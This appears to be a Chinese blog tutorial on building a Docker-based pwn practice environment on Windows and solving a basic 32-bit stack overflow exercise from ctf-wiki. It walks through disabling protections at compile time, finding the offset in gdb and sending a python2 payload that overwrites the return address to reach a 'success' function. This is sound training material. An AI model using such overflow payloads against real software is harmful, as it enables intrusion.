安装虚拟机很重,占空间,影响速度。
今天试了下用Windows下的Docker搭建pwn做题环境,搭配MobaXterm真的很好!
一、Windows下安装Docker desktop
网上参考文章很多,不赘述。
说明:去https://www.docker.com/products/docker-desktop下载最新版本的安装包,国内可能下载不了,你懂的,也有博主分享了baiduyun,安装过程非常简单,不用手动调整windows组件(WSL v2)。
安装完成需要配置源:
国内从 DockerHub 拉取镜像有时会遇到困难,此时可以配置镜像加速器。
阿里云镜像获取地址:https://cr.console.aliyun.com/cn-hangzhou/instances/mirrors
然后把wsl的虚拟机地址移到其他盘(默认C盘):
二、从Dockerfile建立镜像,并运行容器
参考:https://ctf-wiki.org/pwn/linux/user-mode/environment/
新建Dockerfile文件
执行build生成镜像
docker build -t pwn_ubuntu22 .
运行容器
docker run -d -p 25000:22 --name=pwn22 --restart unless-stopped -v home_ubuntu22:/home/your_user_name pwn_ubuntu22
MobaXterm连接容器
三、写C代码、编译、执行
具体代码略,参考:https://ctf-wiki.org/pwn/linux/user-mode/stackoverflow/x86/stackoverflow-basic/
注意编译时要加-no-pie参数:
gcc -m32 -fno-stack-protector stack_example.c -no-pie -o stack_example
执行,观察有栈溢出漏洞:
四、反汇编
目标:找到合适的调试断点及控制程序返回点
objdump -M intel -d stack_example
找到函数:vulnerable
找到返回前的地址:0x080491e5,在这里下断点调试
找到suscess函数地址:0x08049186
五、栈溢出调试(原始方法,暂时没用pwntools)
准备输入文本
脚本:
#s0.py
buffer = ""
for i in range(0x41,0x5b): #AAAA-ZZZZ
buffer += chr(i)*4
print(buffer)
生成文件:
python s0.py > s0.txt
gdb调试
下断点,导入文本:
gdb stack_example
b *0x080491e5
start
r < s0.txt
算出需要填入的字符为0x18个(A-F:6个字母,4*6=24=0x18)
按c回车继续执行
六、最终脚本
再次生成测试文本:
上面算出需要填充0x18个字符,覆盖ebp,再写入返回地址
python2 -c 'print("A" * 0x18 + "\x86\x91\x04\x08")' > s1.txt
说明:“\x86\x91\x04\x08” 为success地址:0x08049186的小端形式,反过来的。
再次调试:
打一下试试:
python2 -c 'print("A" * 0x18 + "\x86\x91\x04\x08")' | ./stack_example
pwn环境配置及最简单的pwn题测试成功了!
